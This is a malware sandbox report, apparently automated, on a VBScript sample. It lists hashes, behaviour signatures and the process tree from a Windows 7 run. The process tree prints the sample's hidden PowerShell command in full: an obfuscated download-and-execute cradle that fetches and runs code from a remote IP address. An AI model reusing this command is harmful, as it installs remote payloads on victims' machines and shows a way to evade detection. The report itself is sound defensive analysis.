Overview

overview

10

Static

static

1

551aa52e13...1e.vbs

windows7-x64

8

551aa52e13...1e.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/01/2025, 12:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e.vbs

  • Size

    6KB

  • MD5

    2cac56c224c4fe93c8133ce8997d6698

  • SHA1

    b02d87284e587e5b59af0ed6d984faf5d05c687d

  • SHA256

    551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e

  • SHA512

    20565ec2837975a30b2b9bafb92e33082360f34c5ab1c3ce6eba0c138d0af5a4311ef71ee35c6fd845b445aaf5e5746ce17f9b6033019390de2041b53dbb3e4e

  • SSDEEP

    48:edClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClICX:eLPXyTuGZOrHTu5Vibru

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$LNxzdRYufhOZ='IeX(NeW-OBJeCT NeT.W';$ykcbidfsOtpw='eBCLIeNT).DOWNLO';$qlwvdNoWtnfz='repoooos(''http://81.10.39.58:8080/test//Update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($LNxzdRYufhOZ+$ykcbidfsOtpw+$qlwvdNoWtnfz);
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1736

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1736-4-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1736-5-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1736-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1736-7-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1736-8-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1736-13-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1736-14-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1736-15-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

    Filesize

    9.6MB

    Download